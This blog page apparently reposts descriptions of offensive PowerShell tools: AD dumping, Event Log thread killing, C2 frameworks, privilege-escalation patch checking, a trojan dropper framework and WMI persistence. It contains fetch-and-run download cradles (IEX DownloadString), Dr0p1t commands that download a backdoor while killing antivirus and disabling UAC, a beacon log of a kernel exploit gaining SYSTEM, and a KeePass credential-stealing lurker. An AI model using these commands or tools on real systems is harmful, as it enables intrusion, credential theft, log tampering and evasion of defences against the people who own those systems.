Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label PowerShell. Show all posts
Showing posts with label PowerShell. Show all posts

Sunday, August 12, 2018

Goddi (Go Dump Domain Info) - Dumps Active Directory Domain Information



Based on work from Scott Sutherland (@_nullbind), Antti Rantasaari, Eric Gruber (@egru), Will Schroeder (@harmj0y), and the PowerView authors.

Install
Use the executables in the releases section. If you want to build it yourself, make sure that your go environment is setup according to the Go setup doc. The goddi package also uses the below package.
go get gopkg.in/ldap.v2

Windows
Tested on Windows 10 and 8.1 (go1.10 windows/amd64).

Linux
Tested on Kali Linux (go1.10 linux/amd64).
  • umount, mount, and cifs-utils need to be installed for mapping a share for GetGPP
apt-get update
apt-get install -y mount cifs-utils
  • make sure nothing is mounted at /mnt/goddi/
  • make sure to run with sudo

Run
When run, will default to using TLS (tls.Client method) over 636. On Linux, make sure to run with sudo.
  • username: Target user. Required parameter.
  • password: Target user's password. Required parameter.
  • domain: Full domain name. Required parameter.
  • dc: DC to target. Can be either an IP or full hostname. Required parameter.
  • startTLS: Use to StartTLS over 389.
  • unsafe: Use for a plaintext connection.
PS C:\Users\Administrator\Desktop> .\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe
[i] Begin PLAINTEXT LDAP connection to 'dc.test.local'...
[i] PLAINTEXT LDAP connection to 'dc.test.local' successful...
[i] Begin BIND...
[i] BIND with 'testuser' successful...
[i] Begin dump domain info...
[i] Domain Trusts: 1 found
[i] Domain Controllers: 1 found
[i] Users: 12 found
        [*] Warning: keyword 'pass' found!
        [*] Warning: keyword 'fall' found!
[i] Domain Admins: 4 users found
[i] Enterprise Admins: 1 users found
[i] Forest Admins: 0 users found
[i] Locked Users: 0 found
[i] Disabled Users: 2 found
[i] Groups: 45 found
[i] Domain Sites: 1 found
[i] Domain Subnets: 0 found
[i] Domain Computers: 17 found
[i] Deligated Users: 0 found
[i] Users with passwords not set to expire: 6 found
[i] Machine Accounts with passwords older than 45 days: 18 found
[i] Domain OUs: 8 found
[i] Domain Account Policy found
[i] Domain GPOs: 7 found
[i] FSMO Roles: 3 found
[i] SPNs: 122 found
[i] LAPS passwords: 0 found
[i] GPP enumeration starting. This can take a bit...
[i] GPP passwords: 7 found
[i] CSVs written to 'csv' directory in C:\Users\Administrator\Desktop
[i] Execution took 1.4217256s...
[i] Exiting...

Functionality
StartTLS and TLS (tls.Client func) connections supported. Connections over TLS are default. All output goes to CSVs and are created in /csv/ in the current working directory. Dumps:
  • Domain users. Also searches Description for keywords and prints to a seperate csv ex. "Password" was found in the domain user description.
  • Users in priveleged user groups (DA, EA, FA).
  • Users with passwords not set to expire.
  • User accounts that have been locked or disabled.
  • Machine accounts with passwords older than 45 days.
  • Domain Computers.
  • Domain Controllers.
  • Sites and Subnets.
  • SPNs and includes csv flag if domain admin (a flag to note SPNs that are DAs in the SPN CSV output).
  • Trusted domain relationships.
  • Domain Groups.
  • Domain OUs.
  • Domain Account Policy.
  • Domain deligation users.
  • Domain GPOs.
  • Domain FSMO roles.
  • LAPS passwords.
  • GPP passwords. On Windows, defaults to mapping Q. If used, will try another mapping until success R, S, etc... On Linux, /mnt/goddi is used.


Share:

Thursday, January 25, 2018

Windows Event Log Killer - Invoke-Phant0m


This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
I have made this script for two reasons. First, This script will help to Red Teams and Penetration Testers. Second, I want to learn Powershell and Low-Level things on Powershell for cyber security field.

Usage
PS C:\> Invoke-Phant0m
        _                 _    ___
  _ __ | |__   __ _ _ __ | |_ / _ \ _ __ ___
 | '_ \| '_ \ / _` | '_ \| __| | | | '_ ` _ \
 | |_) | | | | (_| | | | | |_| |_| | | | | | |
 | .__/|_| |_|\__,_|_| |_|\__|\___/|_| |_| |_|
 |_|


[!] I'm here to blur the line between life and death...

[*] Enumerating threads of PID: 1000...
[*] Parsing Event Log Service Threads...
[+] Thread 1001 Succesfully Killed!
[+] Thread 1002 Succesfully Killed!
[+] Thread 1003 Succesfully Killed!
[+] Thread 1004 Succesfully Killed!

[+] All done, you are ready to go!

Technical Details
https://artofpwn.com/phant0m-killing-windows-event-log.html

Video


Share:

Sunday, January 7, 2018

Tool to simulate fake processes of analysis sandbox/VM software - Fake Sandbox Processes (FSP)


This small script will simulate fake processes of analysis, sandbox and/or VM software that some malware will try to avoid. You can download the original script (made by @x0rz ) in the orig directory.

You can also download my slightly optimized script in the main directory. The file is named fsp.ps1.

Script-Features
  • Some (good) spyware will stop spying on you as long as the processes run, which are created by this script.
  • Requirements: Powershell (preinstalled on Win 7 and newer)
  • Runs on every Windows since Vista
  • Tiny size
  • No CPU load
  • Easy to use
  • No network connection required

Installer-Features
  • Automatically install the script to your autostart directory
  • Extremely easy to install
  • Uninstaller to purge all files
  • NO requirements
  • Tiny size
  • Offline package
  • Automatic updater included - only if you want!

Usage:
Open the command line and paste this command (don't forget to adjust the path!):
Powershell -executionpolicy remotesigned -File "Your\Path\fsp.ps1"
After pressing ENTER you will be asked to either start or stop all processes.

Autostart
If you execute the powershell script with the above command, you will have to rerun it after every login or startup. In order to autostart the script I made an easy-to-use installer.
  • Download the fsp-installer.bat file from the release section.
  • Double-click it.
  • Now you will see this cmd window:


  • Choose "i" to start the installer.
  • Now enter "y" to start installing or "n" to abort.
  • If you entered "y" this image will now pop up:


  • Enter "y" to install the auto-updater or "n" to not install it (it'll work anyways, but it is recommended to install the updater).
You can now close the window or press any key to close it. The (un)installation is complete.

Uninstall
If you no longer want this program on your computer, you'll need the fsp-installer.bat file again. Run it and chose "u" to start the uninstallation process. Then enter "y" if you are ready to uninstall it.



If the process was successful, you'll see a confirmation screen.

Successfully tested on the following Windows versions:
  • Win 10 Professional
  • Win 8.1 Home
  • Win 7 Professional




Share:

Saturday, October 7, 2017

PowerShell Remote Download Cradle Generator and Obfuscator - Invoke-CradleCrafter


Invoke-CradleCrafter is a PowerShell v2.0+ compatible PowerShell remote download cradle generator and obfuscator.

Purpose

Invoke-CradleCrafter exists to aid Blue Teams and Red Teams in easily exploring, generating and obfuscating PowerShell remote download cradles. In addition, it helps Blue Teams test the effectiveness of detections that may work for output produced by Invoke-Obfuscation but may fall short when dealing with Invoke-CradleCrafter since it does not contain any string concatenations, encodings, tick marks, type casting, etc.

Another important component of this research and tool development was to effectively highlight the high-level behavior and artifacts left behind when each cradle is executed. I have tried to highlight this information when you first enter a new cradle type in the interactive menus of the tool.

Ultimately, knowing more about each cradle's behavior and artifacts will help the Blue Team better detect these cradles. This knowledge should also benefit the Red Teamer in making more informed selections of which cradle to use in a given scenario.

Usage

While all of the cradles can be produced by directly calling the Out-Cradle function, the complexity of the moving pieces for all of the stacked obfuscated components makes using the Invoke-CradleCrafter function the easiest way to explorer and visualize the cradle syntaxes and obfuscation techniques that this framework currently supports.

Installation

The source code for Invoke-CradleCrafter is hosted at Github, and you may download, fork and review it from the repository. Please report issues or feature requests through Github's bug tracker associated with this project.

To install:
Import-Module ./Invoke-CradleCrafter.psd1
Invoke-CradleCrafter

Release Notes
v1.0 - 2017-04-28 x33fcon (Gdynia, Poland): PUBLIC Release of Invoke-CradleCrafter.
v1.1 - 2017-05-11 NOPcon (Istanbul, Turkey): Added 3 new memory-based cradles:
  • PsComMsXml
  • PsInlineCSharp
  • PsCompiledCSharp Added 2 disk-based cradles:
  • PsBits
  • BITSAdmin

Share:

Thursday, September 21, 2017

Microsoft PowerShell Module to Find HoneyPots and HoneyTokens in the Network - HoneypotBuster


Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host.

CodeExecution
Execute code on a target machine using Import-Module.

Invoke-HoneypotBuster
HoneypotBuster is a tool designed to spot Honey Tokens, Honey Bread Crumbs, and Honey Pots used by common Distributed Deception vendors. This tool will help spot the following deception techniques:

1. Kerberoasting Service Accounts Honey Tokens

Just like the one described in the ADSecurity article by Sean Metcalf, this tricks attackers to scan for Domain Users with assigned SPN (Service Principal Name) and {adminCount = 1} LDAP Attribute flag. So when you try to request TGS for that user, you’ll be exposed as Kerberoasting attempt. TGS definition: A ticket granting server (TGS) is a logical key distribution center (KDC) component that is used by the Kerberos protocol as a trusted third party.

2. Fake Computer Accounts Honey Pots

Creating many domain computer objects with no actual devices associated to them will result in confusion to any attacker trying to study the network. Any attempt to perform lateral movement into these fake objects will lead to exposure of the attacker.

3. Fake Credentials Manager Credentials Breadcrumbs

Many deception vendors are injecting fake credentials into the “Credentials Manager”. These credentials will also be revealed using tools such as Mimikatz. Although they aren’t real, attackers might confuse them as authentic credentials and use them.

4. Fake Domain Admins Accounts Honey Tokens

Creating several domain admins and their credentials who have never been active is bad policy. These Honey Tokens lure attackers to try brute-forcing domain admin credentials. Once someone tries to authenticate to this user, an alarm will be triggered, and the attacker will be revealed. Microsoft ATA uses this method.

5. Fake Mapped Drives Breadcrumbs

Many malicious automated scripts and worms are spreading via SMB Shares, especially if they’re mapped as Network Drive Share. This tool will try to correlate some of the data collected before to identify any mapped drive related to a specific Honey Pot server.

6. DNS Records Manipulation HoneyPots

One of the methods deception vendors use to detect fake endpoints is registering their DNS records towards the Honey Pot Server. They will then be able to point the attacker directly to their honey pot instead of actual endpoints.


Usage

To install any of these modules, drop the PowerShell scripts into a directory and type
Import-Module PathTo\scriptName.ps1

Then run the Module from the Powershell.
Refer to the comment-based help in each individual script for detailed usage information.


Share:

Saturday, June 24, 2017

Powershell C2 Server and Implants - PoshC2




PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework.

Requires only Powershell v2 on both server and client

C2 Server

Implant Handler


Quick Install
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/C2-Installer.ps1')"

Team Server
Create one PoshC2 team server and allow multiple red teamers to connect using the C2 Viewer and Implant Handler




Share:

Saturday, May 27, 2017

Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities - Sherlock


PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.

Currently looks for:
  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : Secondary Logon Handle

Tested on:
  • Windows 7 SP1 32-bit
  • Windows 7 SP1 64-bit
  • Windows 8 64-bit
  • Windows 10 64-bit

Basic Usage:
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)


Share:

Friday, May 26, 2017

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2


Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features
  • Framework works with Windows and Linux
  • Download executable on target system and execute it silently..
  • The executable size small compared to other droppers generated the same way
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Adding executable after downloading it to startup
  • Adding executable after downloading it to task scheduler ( UAC not matters )
  • Finding and killing the antivirus before running the malware
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • The ability to disable UAC
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it

Screenshots

On Windows




On Linux (Backbox)






Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
  • Python libraries requirements in requirements.txt

Needed dependencies for linux
  • Wine
  • Python 2.7 on Wine Machine
Note : You must have root access

Installation
if you are on linux and do
git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py
And if you are on windows download it and then do
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py
Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible

Tested on:
  • Kali Linux - SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Changelog v1.2
  • Pyinstaller compiling in Linux using wine
  • Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
  • Added the ability to disable and bypass UAC
  • Updated the antivirus list in the antivirus killer
  • Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work 
  • Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
  • Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact


Share:

Tuesday, October 25, 2016

Malicious WMI Events using PowerShell - PowerLurk



PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:
Import locally
    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1   
Download Cradle
    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"   

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent'
    Get-WmiEvent -Name RedTeamEvent   
Delete 'RedTeamEvent' WMI event objects
    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject   

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts
    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe   
Cleanup Malicious WMI Event
    Get-WmiEvent -Name LogNotepad | Remove-WmiObject   

Add-KeeThiefLurker
creates a permanent WMI event that will execute KeeThief (See @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief ) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage
    Add-KeeThiefLurker -EventName KeeThief -WMI   
Query custom WMI class
    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List   
Extract KeeThief output from WMI class
    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))   
Cleanup KeeThiefLurker
    Remove-KeeThiefLurker -EventName KeeThief -WMI   


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition